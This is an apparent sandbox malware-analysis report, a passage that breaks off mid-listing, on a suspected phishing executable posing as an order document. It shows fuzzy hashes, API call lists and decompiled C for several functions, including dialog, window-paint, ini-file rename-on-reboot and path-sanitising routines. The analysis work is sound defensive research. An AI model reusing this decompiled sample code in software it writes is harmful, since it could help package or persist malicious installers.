Opcode Fuzzy Hash: 86bf76fd6922b85a894db2da75582673334d938603a16d6ca09738e07abb0e89
Instruction Fuzzy Hash: 7851CCB16047468FDB30CE6999E47EB73F3BF89200F54462AC95A4F690C332AA41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03507D4C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d2d9e644afd4a6ca6bf83deb6cc9ce25bae35b354a3b353035d46aa0304965
Instruction ID: d573d0408e2586def56f4ce244977dce578ffff3ccf6c52e1417c0ac8c480404
Opcode Fuzzy Hash: 75d2d9e644afd4a6ca6bf83deb6cc9ce25bae35b354a3b353035d46aa0304965
Instruction Fuzzy Hash: 55415736504396DFCB349E7096513DA77B2BFDA360F46481ECC89BB160D3315A40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0350A71A Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2699c7a68dfb64d5c5ed3c14818774807a609e9933b8a48cd23be16fdfb05423
Instruction ID: ffd0aaa6c9357f8784cd3166b063529185e6db7077ea82fbc7a274020e282c8c
Opcode Fuzzy Hash: 2699c7a68dfb64d5c5ed3c14818774807a609e9933b8a48cd23be16fdfb05423
Instruction Fuzzy Hash: 3F41DFB164839A8FDB358E34D8D83DA3762FF16344F95417ECD9A4BA51C3360686CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03511B01 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5865dce3790246c8ba5991af4977f19ad61559dc85ccf2b210a84850699d3c78
Instruction ID: f0d3c730565fa872b496678308d728af0850502c3336d9fbf308ee125be4e55d
Opcode Fuzzy Hash: 5865dce3790246c8ba5991af4977f19ad61559dc85ccf2b210a84850699d3c78
Instruction Fuzzy Hash: 6F316638B04B098FE770DD24D8E4BD773A2BF59340F95412ACF498F665E7309A428B01

Uniqueness

Uniqueness Score: -1.00%

Function 0350A788 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27999120d46560bf7c4f01c8dfdda36ed18a842315c23e2e841c5bb5ccf37ca7
Instruction ID: cc1368ad72a5509d8f6a7f4b7a5a897e06b4247bc82dde86e93d2ab6e1e31a6b
Opcode Fuzzy Hash: 27999120d46560bf7c4f01c8dfdda36ed18a842315c23e2e841c5bb5ccf37ca7
Instruction Fuzzy Hash: 3F41DD76208396DBCB399E70E5943CA3722FF8B314F54457EC86A6A851D3360286CA13

Uniqueness

Uniqueness Score: -1.00%

Function 03511927 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3599d10aa9aaebfb8e70e50aa7ae79d31855da4807fe08532fae90cbfcfc38a5
Instruction ID: 440cc9b0d8e9571f61690075b548e1a9142ae408181e57fb333f3620775fc6a3
Opcode Fuzzy Hash: 3599d10aa9aaebfb8e70e50aa7ae79d31855da4807fe08532fae90cbfcfc38a5
Instruction Fuzzy Hash: ED31AA657407468FDB34DEB8E9C03EB23A3BF56210F45066ACD568B760E325C948CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0350275D Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bceacb24ec077a471fe7d6cbfb97f697d904548a4008de0536809c809343b859
Instruction ID: 52e276d1d36076ecdec1bcc745a8452afcaff3e0151cfa546839c23873e95757
Opcode Fuzzy Hash: bceacb24ec077a471fe7d6cbfb97f697d904548a4008de0536809c809343b859
Instruction Fuzzy Hash: AC11224E008752D3D928ECE577E83FB116D7F8E260F494C3A8CAA3A5F2654345C0C8A3

Uniqueness

Uniqueness Score: -1.00%

Function 0350DC7B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c562e381c908b896c8e2eb1c88857410758e474250c8ca1871e46b9fec06aab
Instruction ID: 96700339de3c0c9d49253798bd62a8547f20f8980ce29a6a46b56e30a358a45b
Opcode Fuzzy Hash: 1c562e381c908b896c8e2eb1c88857410758e474250c8ca1871e46b9fec06aab
Instruction Fuzzy Hash: AFD0C7721504459BCA5AEA24D4D5AD0B774F74D715B040DA5C05287901D61EA65BC600

Uniqueness

Uniqueness Score: -1.00%

Function 03510E7B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e512a7b4dfbc9a6c1a3b21ecca9cae05f6f62ee543a8488cab624b03aca8b1ab
Instruction ID: 5af13bf1584d33343294fd2578c992e668eaeb9b378debf96c621fc608011c20
Opcode Fuzzy Hash: e512a7b4dfbc9a6c1a3b21ecca9cae05f6f62ee543a8488cab624b03aca8b1ab
Instruction Fuzzy Hash: 4BB092303109818FCA45DE28C180F8073B1BF24B80BC64490A045C7A51C324E800CA00

Uniqueness

Uniqueness Score: -1.00%

Function 004042A3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004042A3(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fcfc =  *0x41fcfc + 1;
								__eflags =  *0x41fcfc;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041C1(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236c0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E00404547(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424728, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424728, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fcfc; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x420508; // 0x4edb2c
					_t25 = _t103 + 0x14; // 0x4edb40
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E0040417C(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404523();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423efc; // 0x4f060e
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424778;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040426E;
					E0040415A(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E0040415A(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E0040417C( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E0040418F(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424734 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fcfc = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fcfc = 0;
					return 0;
				}
			}

0x004042b3
0x004043c5
0x004043d8
0x00404434
0x00404434
0x00404438
0x004044fe
0x00404505
0x00404507
0x00404507
0x00404507
0x0040450d
0x0040450d
0x00404510
0x00000000
0x00404517
0x00404446
0x00404448
0x0040444b
0x00404452
0x00404454
0x0040445b
0x0040445d
0x00404460
0x00404463
0x00404468
0x0040446e
0x00404471
0x00404478
0x00404486
0x0040449e
0x004044a0
0x004044a8
0x004044b7
0x004044b9
0x004044b9
0x00404478
0x0040445b
0x004044bc
0x004044c3
0x00000000
0x004044c5
0x004044c5
0x004044cc
0x00000000
0x00000000
0x004044ce
0x004044d2
0x004044e3
0x004044e3
0x004044e5
0x004044e9
0x004044f7
0x004044f7
0x00000000
0x004044fb
0x004044c3
0x004043e0
0x004043e3
0x00000000
0x00000000
0x004043eb
0x004043f1
0x00000000
0x00000000
0x004043f7
0x004043fd
0x004043fd
0x00404400
0x00404403
0x00000000
0x00000000
0x00404426
0x00404426
0x00404428
0x0040442a
0x0040442f
0x00000000
0x004042b9
0x004042b9
0x004042bc
0x004042c1
0x004042c3
0x004042d2
0x004042d2
0x004042d9
0x004042dc
0x004042de
0x004042e3
0x004042ec
0x004042f2
0x004042fe
0x00404301
0x0040430a
0x0040430f
0x00404312
0x00404317
0x0040432e
0x00404335
0x00404348
0x0040434b
0x00404360
0x00404367
0x0040436c
0x00404371
0x00404371
0x00404380
0x0040438f
0x004043a1
0x004043a6
0x004043b6
0x004043b8
0x00000000
0x004043be

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
GetDlgItem.USER32(00000000,000003E8), ref: 00404342
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
GetSysColor.USER32(?), ref: 00404371
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
lstrlenA.KERNEL32(?), ref: 00404392
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
GetDlgItem.USER32(?,0000040A), ref: 00404418
SendMessageA.USER32(00000000), ref: 0040441B
GetDlgItem.USER32(?,000003E8), ref: 00404446
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
LoadCursorA.USER32(00000000,00007F02), ref: 00404495
SetCursor.USER32(00000000), ref: 0040449E
LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
SetCursor.USER32(00000000), ref: 004044B7
SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7

Strings

nB@, xrefs: 004044A2
N, xrefs: 00404434
Call, xrefs: 00404471

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$nB@
API String ID: 3103080414-3023683851
Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424734;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f20, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424728;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D08(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ac0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x422ec0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226c0, "%s=%s\r\n", 0x422ac0, 0x422ec0);
						_t53 = _t52 + 0x10;
						E004060BB(_t37, 0x400, 0x422ec0, 0x422ec0,  *((intOrPtr*)( *0x424734 + 0x128)));
						_t12 = E00405C32(0x422ec0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405CAA(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405B97(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405B97(_t38, _t21 + 0xa, 0x40a3d0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405BED(_t24 + _t46, 0x4226c0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405CD9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C32(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ac0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405d08
0x00405d11
0x00405d18
0x00405d2c
0x00405d54
0x00405d5f
0x00405d63
0x00405d83
0x00405d8a
0x00405d94
0x00405da1
0x00405da6
0x00405dab
0x00405daf
0x00405dbe
0x00405dc0
0x00405dcd
0x00405dd1
0x00405e6c
0x00000000
0x00405de7
0x00405df4
0x00405e18
0x00405e1c
0x00405e3b
0x00405e3f
0x00405e3f
0x00405e41
0x00405e4a
0x00405e55
0x00405e60
0x00405e66
0x00000000
0x00405e66
0x00405e1e
0x00405e21
0x00405e2c
0x00405e28
0x00405e2a
0x00405e2b
0x00405e2b
0x00405e33
0x00405e35
0x00000000
0x00405e35
0x00405dff
0x00405e05
0x00000000
0x00405e05
0x00405dd1
0x00405daf
0x00405d2e
0x00405d39
0x00405d42
0x00405d46
0x00000000
0x00000000
0x00405d46
0x00405e77

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42

Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9

GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
wsprintfA.USER32 ref: 00405D7D
GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
GlobalFree.KERNEL32(00000000), ref: 00405E66
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D

Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00405C36
Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58

Strings

[Rename], xrefs: 00405DE7, 00405DF9
%s=%s, xrefs: 00405D73

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00406303 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406303(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405A9E(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405A5C("*?|<>/\":", _t5))) == 0) {
							E00405BED(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406305
0x0040630d
0x00406321
0x00406321
0x00406327
0x00406334
0x00406334
0x00406335
0x00406337
0x0040633b
0x0040633d
0x00406346
0x00406348
0x00406362
0x0040636a
0x0040636a
0x0040636f
0x00406371
0x00406373
0x00406377
0x00406378
0x0040637b
0x00406383
0x00406385
0x00406389
0x00000000
0x00000000
0x0040638f
